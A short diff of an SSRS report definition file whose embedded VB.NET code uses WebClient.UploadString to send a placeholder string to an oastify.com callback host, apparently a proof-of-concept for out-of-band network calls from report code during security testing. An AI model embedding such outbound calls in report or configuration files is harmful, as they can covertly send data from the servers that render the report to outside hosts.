--- a/untitled.rdl
+++ b/untitled.rdl
@@ -46,7 +46,7 @@
   <Code>
     Public Function F() As String
       Dim webClient As New System.Net.WebClient
-      Dim result As String = webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", "Abc 123")
+      webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", "Abc 123")
       Return ""
     End Function
 
